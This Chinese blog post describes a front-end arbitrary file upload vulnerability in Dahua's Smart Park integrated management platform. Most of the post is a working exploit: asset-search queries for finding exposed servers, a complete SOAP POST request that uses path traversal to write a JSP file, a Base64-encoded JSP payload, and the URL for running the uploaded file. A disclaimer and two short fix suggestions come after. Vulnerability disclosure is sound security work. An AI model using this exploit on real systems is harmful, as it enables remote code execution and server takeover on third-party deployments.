大华智慧园区综合管理平台前台任意文件上传漏洞

本文涉及的产品
可观测可视化 Grafana 版,10个用户账号 1个月
性能测试 PTS,5000VUM额度
可观测监控 Prometheus 版,每月50GB免费额度
简介: 大华智慧园区综合管理平台存在前台任意文件上传漏洞,攻击者可通过特定Payload获取服务器敏感信息,进而获取服务器控制权限。

声明


  请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、简介


  大华智慧园区综合管理平台是由大华技术股份有限公司(Dahua Technology)开发的一款综合管理解决方案。该平台旨在帮助园区管理者提高管理效率、提升安全水平、优化资源利用,并实现智能化的园区运营。大华智慧园区综合管理平台采用模块化设计和开放式架构,可根据不同园区的需求进行定制和扩展。同时,它还支持云端部署和移动端访问,方便管理者随时随地监控园区运营情况。

二、影响范围


大华智慧园区综合管理平台

image.png


三、资产搜索


  • app="dahua-智慧园区综合管理平台"
  • body="/WPMS/asset/lib/gridster/"


四、漏洞测试


  漏洞利用点为/emap/webservice/gis/soap/poi接口,当访问接口时出现如下响应体时,基本可认定该漏洞存在。

image.png

POC:

POST /emap/webservice/gis/soap/poi HTTP/1.1

Host: XX.XX.XX.XX:8009

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8

Cookie: JSESSIONID=A58962636D1422B038BF985177F4C02E; JSESSIONID=ADE54516354577F1C8F8208580883BA2

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 1378

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.poi.mapbiz.emap.dahuatech.com/">

  <soapenv:Header/>

  <soapenv:Body>

     <res:uploadPicFile>

        <arg0>/../../xxx.jsp</arg0>

        <arg1>

 XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

 </arg1>

     </res:uploadPicFile>

  </soapenv:Body>

</soapenv:Envelope>

在如上POC中arg0是我们访问上传文件的地址,arg1是上传文件的内容

内容部分我们以时间为例,如下:

PCVAcGFnZSBpbXBvcnQ9ImphdmEudGV4dC4qLGphdmEudXRpbC4qLGphdmEuaW8uKiIlPgo8JQpTaW1wbGVEYXRlRm9ybWF0IGRmID0gbmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eS1NTS1kZCBISDptbTpzcyIpOwpvdXQucHJpbnRsbihkZi5mb3JtYXQobmV3IERhdGUoKSkpOwpGaWxlIGZpbGUgPSBuZXcgRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKTsKZmlsZS5kZWxldGUoKTsKJT4=(该部分内容为Base64编码后的字符串)

将该部分内容放在arg1中

image.png

访问URL地址:http://url/upload/***.jsp

image.png

四、修复建议


1、 做好安全补丁。

2、 访问来源进行限制,避免暴露在公网以及不安全的网络环境当中。

目录
相关文章
|
3天前
|
存储 自然语言处理 搜索推荐
校园社交圈子系统网站 校园社交圈子系统用户注册与登录 校园社交圈子系统信息发布与审核 校园社交圈子系统搜索功能优化 校园社交圈子系统数据存储与处理
校园社交圈子系统网站是面向大学生的在线社交平台,提供用户注册与登录、信息发布与分享、搜索与发现、数据存储与处理等功能。用户可通过手机号、邮箱或第三方账号注册登录,发布多种信息并接受审核。平台优化了搜索功能,支持关键词和高级搜索,确保信息质量和安全性。数据存储采用分布式数据库和主从复制技术,保障数据安全与高效处理。
30 3
|
4月前
|
安全 BI PHP
php前后端分离,仓储模式r的医院不良事件上报系统源码
此医院安全不良事件管理系统采用前后端分离架构(PHP+Laravel8+Vue2+Element),实现事件上报至解决的全流程管理。系统支持结构化上报、数据自动引用、智能流程及预警,配备质控分析工具生成各类报表。通过PDCA闭环管理,确保事件得到有效处置并预防再发,同时提供便捷上报通道,优化上报效率。
php前后端分离,仓储模式r的医院不良事件上报系统源码
|
4月前
|
安全 测试技术 数据库
RC 漏洞挖掘:开发厂商.(批量通杀)(教育漏洞报告平台)
RC 漏洞挖掘:开发厂商.(批量通杀)(教育漏洞报告平台)
93 2
|
5月前
|
小程序 前端开发 物联网
无人桌球室小程序平台系统定制开发方案
【项目摘要】随着社会进步和科技发展,无人桌球室小程序应运而生,解决传统桌球室管理难题。提供在线预订、自动计分、赛事查询及会员管理功能,采用微信小程序前端、微服务后端及物联网智能设备技术实现。市场推广结合社交媒体、线下活动及口碑营销。需开发支持,请联系小编。
|
Web App开发 XML 安全
海康威视iVMS综合安防系统任意文件上传漏洞
海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实施对目标的攻击。
768 1
|
前端开发
前端必备的各类网站总结
前端必备的各类网站总结
NFT卡牌游戏链游系统开发(开发方案)/详情规则/成熟技术/设计界面/案例项目/源码程序
NFT (Non Homogeneous Token) card chain game refers to a game based on blockchain technology where NFT is used as the card in the game. NFT is a unique and non interchangeable digital asset that can represent various virtual cards, props, or characters in the game.
|
项目管理
WMWS工程仪器设备在线监测管理系统使用注意事项
WMWS(Wincom Monitoring Web System)是稳控科技专门为终端客户开发的在线监测管理系统,基于BS 架构。可在浏览端实现项目管理、数据查看与下载、曲线查看等操作。系统界面风格简约、布局统一、逻辑清晰,具有极佳的操控体验。三层监测要素架构,实现了多项目、多设备、多测点无限扩展,可满足小型、中型的单(多)项目管理。
WMWS工程仪器设备在线监测管理系统使用注意事项
|
JSON 监控 安全
通达OA任意文件上传漏洞详细分析
通达OA任意文件上传漏洞详细分析
|
安全 BI
不良事件管理系统源码,商业级全套源码
相关技术:PHP+vscode+vue2+element+laravel8+mysql5.7 有演示,商业级源码 不良事件上报系统,对患者安全(不良)事件实施全过程追踪管理,包括数据上报、流转审批、数据统计、原因分析、措施制定、效果追踪等环节,管理过程设置权限分级,相关人员职责明确,通过闭环管理使不良事件得到有效解决。 包含10大类医疗安全(不良)事件,即医疗事件、药品事件、护理事件、医学技术检查事件、输血事件、医院感染事件、医疗器械事件、安全管理与意外伤害事件,进一步又细分为60余类二级事件,全面覆盖医院所有临床科室、辅助科室及职能部门。
130 0
不良事件管理系统源码,商业级全套源码